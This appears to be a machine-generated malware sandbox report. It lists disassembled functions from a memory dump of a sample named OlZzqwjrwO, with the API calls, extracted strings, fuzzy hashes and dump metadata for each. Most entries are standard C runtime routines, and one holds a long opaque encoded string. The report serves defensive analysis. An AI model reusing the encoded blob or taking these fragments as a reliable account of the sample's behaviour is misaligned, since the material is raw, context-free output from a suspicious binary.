Instruction ID: 0da8f536360b0fb26740d06565fda84bcb44ac6cc97d4910cd2df6c42613e781
Opcode Fuzzy Hash: 2e1f11e2f5fb8b6f5f5cb9471793ade9c397e797c40a1014ab29af20b239fdf2
Instruction Fuzzy Hash: 6D81C471600B169BEB249F6DCC81F6AB7B9FF54324F24862EF411D6781E770E9808752

Function 00432B1B Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00432EBD

Part of subcall function 00430E6C: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45

Part of subcall function 00432718: CreateCompatibleDC.GDI32(00000D62), ref: 00432894

Strings

Ku^%, xrefs: 00432E26
Ku^%, xrefs: 00432D62

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: AllocateCompatibleCreateHeapInfoParametersSystem
String ID: Ku^%$Ku^%
API String ID: 392924372-1067927601
Opcode ID: ffdc60f1e004c543c03ed2e42b24d9c624f6bc23b499833a74f790060f19a536
Instruction ID: 62ef33d165420df4abe6194fc317c011647a9d43179361cb113ffb45af4e0bee
Opcode Fuzzy Hash: ffdc60f1e004c543c03ed2e42b24d9c624f6bc23b499833a74f790060f19a536
Instruction Fuzzy Hash: 4AE12B71E006158BDF289E598D8657FB7B0AB0C314F24292BE511FA390D7BC9A418B8B

Function 0044C202 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0044C1F9,0043D4A6,0043CFF7), ref: 0044C210
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0044C21E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0044C237
SetLastError.KERNEL32(00000000,0044C1F9,0043D4A6,0043CFF7), ref: 0044C289

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 4538fd3f119ebfccef05c07daf3c44292a57c8edab061bb9a8ac19b89b5d77cf
Instruction ID: c0e2f545b2bb83990020f58b3cafac4cb819fbf5ee5e5dfe57bf4abdb9a8f05a
Opcode Fuzzy Hash: 4538fd3f119ebfccef05c07daf3c44292a57c8edab061bb9a8ac19b89b5d77cf
Instruction Fuzzy Hash: 5601F53260B6116EB69117B66CC656B2A88EF1137A328033FF920851F2FFD94C41919D

Function 004468EB Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0044692D

Strings

.cmd, xrefs: 0044694B
.bat, xrefs: 0044695C
.exe, xrefs: 0044693A
.com, xrefs: 0044696D

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: d72b72fa5fc946e5bf17734d860b3a429cd1b964a4d3335ef3d5c7acc65a1e94
Instruction ID: b55bede8d45b761b400ac8ce0250aded4c8690036b953bdef2cda7eece1c3866
Opcode Fuzzy Hash: d72b72fa5fc946e5bf17734d860b3a429cd1b964a4d3335ef3d5c7acc65a1e94
Instruction Fuzzy Hash: A8010477A24A56213614156D9C0267797988B93BB6727402FFC44EB2C2EEECED02019E

Function 00443916 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,2263B8EC,?,?,00000000,0045D6E6,000000FF,?,004439E0,0044387B,?,00443A9B,00000000), ref: 0044394B
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044395D
FreeLibrary.KERNEL32(00000000,?,?,00000000,0045D6E6,000000FF,?,004439E0,0044387B,?,00443A9B,00000000), ref: 0044397F

Strings

CorExitProcess, xrefs: 00443955
mscoree.dll, xrefs: 00443944

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3daf6b45365e10327e4674e32e0bbb7648fd22c9221b51d64b84b5ca0bf51f62
Instruction ID: 98d842734981b974643d07bc2e17aaafc6a7a08e37008b1518908caaa5ffc225
Opcode Fuzzy Hash: 3daf6b45365e10327e4674e32e0bbb7648fd22c9221b51d64b84b5ca0bf51f62
Instruction Fuzzy Hash: DC01A771904655EBDB118F50CC05BAEB7B8FB44B51F000626E811A22D0EBF89A04CA99

Function 0044623D Relevance: 7.6, APIs: 5, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ec4ca088175b3d71b74edc192f962602cbf94f283bf042d020ea8e91f16aadc
Instruction ID: 8aab27407c0a82a01c0ac988981d35579ce087bbb9e55deaa5eb6bc71ee87661
Opcode Fuzzy Hash: 1ec4ca088175b3d71b74edc192f962602cbf94f283bf042d020ea8e91f16aadc
Instruction Fuzzy Hash: 6C51707990024DAAEF00EFE4D844AEEB7B8FF09710F11405BE815E7250EB74DA45CB6A

Function 00446CD2 Relevance: 7.6, APIs: 5, Instructions: 143pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(00446BF7,?,00000000,?), ref: 00446CF4
GetFileInformationByHandle.KERNEL32(00446BF7,?), ref: 00446D4E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00446BF7,?,000000FF,00000000), ref: 00446DDC
__dosmaperr.LIBCMT ref: 00446DE3
PeekNamedPipe.KERNEL32(00446BF7,00000000,00000000,00000000,?,00000000), ref: 00446E20

Part of subcall function 00446999: __dosmaperr.LIBCMT ref: 004469CE

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: c898b499f90ca7519afdcdd7f8d9df92fdf4b61206adcc718103c1ca81f84296
Instruction ID: 7fef5dbdd5f1ebb30aa965719069ce331059867e0b66cf3bcb9aaaf835df89e4
Opcode Fuzzy Hash: c898b499f90ca7519afdcdd7f8d9df92fdf4b61206adcc718103c1ca81f84296
Instruction Fuzzy Hash: 584160B5A00704AFEB24DFA5DC459ABBBF9FF89304B11452EF846D3610E734A845CB16

Function 00419496 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 414COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 00419705
_wctomb_s.LIBCMT ref: 00419800
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,?,00000000,00000000), ref: 0041986B

Strings

TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 004198F9, 00419958, 0041998F

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$_wctomb_s
String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK
API String ID: 2587698369-3172509236
Opcode ID: e38c58a5a5958fed477ecaf3075b22f118631efb8f19824a914c76d591f83435
Instruction ID: b61214d9bb6ea9f5f500f4b7bc4d1bc7ad059250a5a7ab9ce73f7134a944e9a2
Opcode Fuzzy Hash: e38c58a5a5958fed477ecaf3075b22f118631efb8f19824a914c76d591f83435
Instruction Fuzzy Hash: 14E1B6B1E042099BDF249A989CA65FE7674BB44310F24052BE555EA3D0D37C8EC18B9F

Function 00403EAD Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 400COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00404418

Strings

null, xrefs: 00404226
%1.17g, xrefs: 00404273
,]{: }, xrefs: 004044BF

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: %1.17g$,]{: }$null
API String ID: 4218353326-1793514501
Opcode ID: 1febabab61847861726e4eccc5dd4458819082e0fa0a32231921fccec61d2490
Instruction ID: dfdaef210c9fde1e563ad86d0075ca4844e5c450f328af3dc752b2d50a02e017
Opcode Fuzzy Hash: 1febabab61847861726e4eccc5dd4458819082e0fa0a32231921fccec61d2490
Instruction Fuzzy Hash: 68B1DFE2B042005BD7006A669C5162B65D98FD1359F09453FEF4AF33C2FA3EDE19829B

Function 00459DC4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00459CCA,?,?,00000000,00000000,00000000,?), ref: 00459DE9
CatchIt.LIBVCRUNTIME ref: 00459ECF

Strings

MOC, xrefs: 00459DFB
RCC, xrefs: 00459E03

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
Instruction ID: 680bccfe0e0854ffc158b5e00edb6862103a1416f9df0b4f366e0dcb6488795f
Opcode Fuzzy Hash: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
Instruction Fuzzy Hash: 34416871900209EFDF15DF98CD82AAEBBB5FF48305F18805AF904672A2D3399D54DB58

Function 008DA02B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 008DA050
CatchIt.LIBVCRUNTIME ref: 008DA136

Strings

RCC, xrefs: 008DA06A
MOC, xrefs: 008DA062

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
Instruction ID: 493c5ded0e824050eee54d310ba580054d01e7971bf862ddb4784a349464d280
Opcode Fuzzy Hash: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
Instruction Fuzzy Hash: A3416D71900209EFCF1ADF98CD81AEEBBB5FF48300F28825AF919A7251D3359950DB52

Function 00456D31 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00456DCD,?,0000376F,0045FB2F,?,?,?,00456C15,00000000,FlsAlloc,00465EF0,00465EF8), ref: 00456D3E
GetLastError.KERNEL32(?,00456DCD,?,0000376F,0045FB2F,?,?,?,00456C15,00000000,FlsAlloc,00465EF0,00465EF8,?,^D,0044C1B0), ref: 00456D48
LoadLibraryExW.KERNEL32(?,00000000,00000000,?,^D,0044C1B0,0044C294,00000003,0044069B,?,?,?,?,00000000,0045FB2F,004058C6), ref: 00456D70

Strings

api-ms-, xrefs: 00456D55

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 1c601aedc7284344527d2769353e9bde843b729d446c6642f172212a38ab6b00
Instruction ID: 0ecaf6013e36b0431d801e3916b08b76fdb95d3f1c140b132a01747a849ad822
Opcode Fuzzy Hash: 1c601aedc7284344527d2769353e9bde843b729d446c6642f172212a38ab6b00
Instruction Fuzzy Hash: 04E012303C4204B7DB101B61DC06B593A789B10B56F540431FD0DA51E1EBF5A858954E

Function 0045074A Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(2263B8EC,00455523,00000000,?), ref: 004507AD

Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00450A08
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00450A50
GetLastError.KERNEL32 ref: 00450AF3

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 96a8a5487e7c3d3faf6390a68133758f583929af7c12fd611465a668075fbc12
Instruction ID: e52ebc46d8e9f13757024da4890b50ba647b118a1bf42f91cd2d0be3dbea7dc8
Opcode Fuzzy Hash: 96a8a5487e7c3d3faf6390a68133758f583929af7c12fd611465a668075fbc12
Instruction Fuzzy Hash: A0D17BB9D00248AFDF15CFA8C8809EDBBB4FF09315F18816AE855E7352E734A946CB54

Function 008D09B1 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(0046B080,008D578A,00000000,?), ref: 008D0A14

Part of subcall function 008D346A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,008D578A,008D578A,008C3F62,008D0768,0000FDE9,00000000,?,?,?,008D1067,0000FDE9,00000000,?), ref: 008D3516

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 008D0C6F
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 008D0CB7
GetLastError.KERNEL32 ref: 008D0D5A

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: f7a2fa6a9c7b7c2702c5415ca5342024ae727f2fb94ff8ae16218cd9c601ae44
Instruction ID: 4202879ebbf7e7b1f2be5da2a6d8b42f324f0a7c1b40d7ebf2c5d0a5ee6fb655
Opcode Fuzzy Hash: f7a2fa6a9c7b7c2702c5415ca5342024ae727f2fb94ff8ae16218cd9c601ae44
Instruction Fuzzy Hash: 21D13775D046589FCB15CFE8D880AADBBB5FF09314F28822AE855EB352E730A941CF51

Function 004596C6 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0045978D
___AdjustPointer.LIBCMT ref: 004597B0
___AdjustPointer.LIBCMT ref: 0045984C

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: c82cfddcd8694e2bdb1e743d5f084ed403ad5a837ea31cf34a60513f078c136f
Instruction ID: 4fadf7dd59c53bd1b12e0029445d2e83e107cc747934abb9f5ec8e89f131d8d2
Opcode Fuzzy Hash: c82cfddcd8694e2bdb1e743d5f084ed403ad5a837ea31cf34a60513f078c136f
Instruction Fuzzy Hash: 8C51F276A14202EFDB289F11D981BAA73A4EF18706F14452FEC0157292E73DEC49CB99

Function 008D992D Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 008D99F4
___AdjustPointer.LIBCMT ref: 008D9A17
___AdjustPointer.LIBCMT ref: 008D9AB3

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: e549594ee335f88c809106c5544a2f4baf43b5eb7b90bfa02ae88c691973c827
Instruction ID: 3184407fc1a60f4943d86c1fb39e04126ab0c7338d7833b765227d854833ac16
Opcode Fuzzy Hash: e549594ee335f88c809106c5544a2f4baf43b5eb7b90bfa02ae88c691973c827
Instruction Fuzzy Hash: F251E072600616EFDB288F58C881BAA77A9FF44310F14422FE889C7391EB31ED41CB95

Function 004537D0 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b8450e9b4afcbafb4f61d0450c1d7e417d22fbc98e5ee0c888f4ba12a7ca7c
Instruction ID: a7f2c4688ec43d2a23ac8beb8ca83e3134fddb6ab0c13f52a90a8fe9f94a791d
Opcode Fuzzy Hash: f5b8450e9b4afcbafb4f61d0450c1d7e417d22fbc98e5ee0c888f4ba12a7ca7c
Instruction Fuzzy Hash: EE412AF2A00304AFD7249F79CC42B6AFBE8EB84756F10452FF551DB382D2B99A058784

Function 0044C89A Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(83000000,2263B8EC,0000001C,2263B8EC,?,?,?), ref: 0044C7B6
__FindPESection.LIBCMT ref: 0044C7F3
_ValidateScopeTableHandlers.LIBCMT ref: 0044C813
__FindPESection.LIBCMT ref: 0044C82D

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: FindSection$HandlersQueryScopeTableValidateVirtual
String ID:
API String ID: 1876002356-0
Opcode ID: c5c89110117f95e94e9ebb8d4fd24969d439cb80e1b6e8bbea251b6fa9d5d390
Instruction ID: 16c3c4676ac924f9bbc116e317de4c153b4417dc4f771cedf4f7c3d11fae8c19
Opcode Fuzzy Hash: c5c89110117f95e94e9ebb8d4fd24969d439cb80e1b6e8bbea251b6fa9d5d390
Instruction Fuzzy Hash: CF31B5B5E022159BFF54CBA9A9C07BE73A4EB09315F09007ADD41E7352E739DC018BA9

Function 008CD17C Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,008CD289,000000FF,0046B0C0,008B6A8C,00000000,00885C9A,?,008CD03D,00000021,00465044,0046503C,00465044,008B6A8C), ref: 008CD23D

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
Instruction ID: 212059d943ce3e965e7d3025c3cf6d8c3fa8a2732f1ed77cb9161e5c6fa4c3e8
Opcode Fuzzy Hash: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
Instruction Fuzzy Hash: F621C631A41310A7DB21ABA4EC90F5A7778FB41774B250239EC15E7291E770FD00C6D5

Function 00450F41 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,004481E1,00000001,?,004481E1,h5@,?,00000000), ref: 00450F57
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00403568,00000000), ref: 00450F64
SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00403568,00000000), ref: 00450F8A
SetFilePointerEx.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00450FB0

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
Instruction ID: 1514e75016c253887b100742bd2e0aa0853bf3b84a7615600f3982ba0bc5b80c
Opcode Fuzzy Hash: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
Instruction Fuzzy Hash: B1116636805219ABDF209F51CC48A9F3F7DFB00725F004115FC20922A1D7B19A40CAA5

Function 008D11A8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,008C8448,00000001,?,008C8448,008837CF,?,00000000), ref: 008D11BE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,008837CF,00000000), ref: 008D11CB
SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,008837CF,00000000), ref: 008D11F1
SetFilePointerEx.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008D1217

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
Instruction ID: ee4b8429ace340c2c4686603bfc52f1f78aa5c7c0322558fc642b61b8f34742b
Opcode Fuzzy Hash: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
Instruction Fuzzy Hash: EB115775904219BBCF109F55EC48A9E7F7DFF04760F108255F820E22A0E7B1DA50DBA5

Function 00455DA6 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,00455C9F,00000000,?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000), ref: 00455DBC
GetLastError.KERNEL32(?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000,?,00455C9F,?,00000104,00446C37), ref: 00455DC6
__dosmaperr.LIBCMT ref: 00455DCD
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000), ref: 00455DF7

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: 40aed38a608d94dd85f4980ee519dcea4f2932da946f037f09bb496e255caaba
Instruction ID: 83aad2bcbc88ad1b691cbbc28925ead7dadcf548e2ab308fdfae5f9a37bb2b5e
Opcode Fuzzy Hash: 40aed38a608d94dd85f4980ee519dcea4f2932da946f037f09bb496e255caaba
Instruction Fuzzy Hash: 50F0A436200700AFDB205F67CC09E277BBDEF45361710842AF956C2521DB76EC14CB68

Function 00455E0C Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,00455C9F,00000000,?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001), ref: 00455E22
GetLastError.KERNEL32(?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000,?,00455C9F,?,00000104), ref: 00455E2C
__dosmaperr.LIBCMT ref: 00455E33
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000), ref: 00455E5D

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: 978842d79e248325d5d1c5fcbdbac71f7ead08704c26e555b85ab8378b580012
Instruction ID: 58d23dfaa7b1bff066b533c88cf6507f29fdd6be1c16f2e24496f8287ce13408
Opcode Fuzzy Hash: 978842d79e248325d5d1c5fcbdbac71f7ead08704c26e555b85ab8378b580012
Instruction Fuzzy Hash: 49F0A436200600AFDF205F72DC09E2B7BADEF44361714842AF959D2121DB75EC14CB58

Function 008D600D Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,008D5F06,00000000,?,008DB683,008D5F06,008C6E9E,?,00000000,00000104,?,00000001,00000000), ref: 008D6023
GetLastError.KERNEL32(?,008DB683,008D5F06,008C6E9E,?,00000000,00000104,?,00000001,00000000,00000000,?,008D5F06,?,00000104,008C6E9E), ref: 008D602D
__dosmaperr.LIBCMT ref: 008D6034
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,008DB683,008D5F06,008C6E9E,?,00000000,00000104,?,00000001,00000000,00000000), ref: 008D605E

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: c7c4edbd7a7b70f3d07427bfb556099335345e9fdb19da3b7b6c0357393f98ce
Instruction ID: 0b1c0cba288c76db96bc1252fc0a3a3f748d338e9e2ffca63a9738c957208b99
Opcode Fuzzy Hash: c7c4edbd7a7b70f3d07427bfb556099335345e9fdb19da3b7b6c0357393f98ce
Instruction Fuzzy Hash: E2F0A436200604AFDB309FA6DC04E177BADFF44360B10852AF556D2620EB71EC20CB61

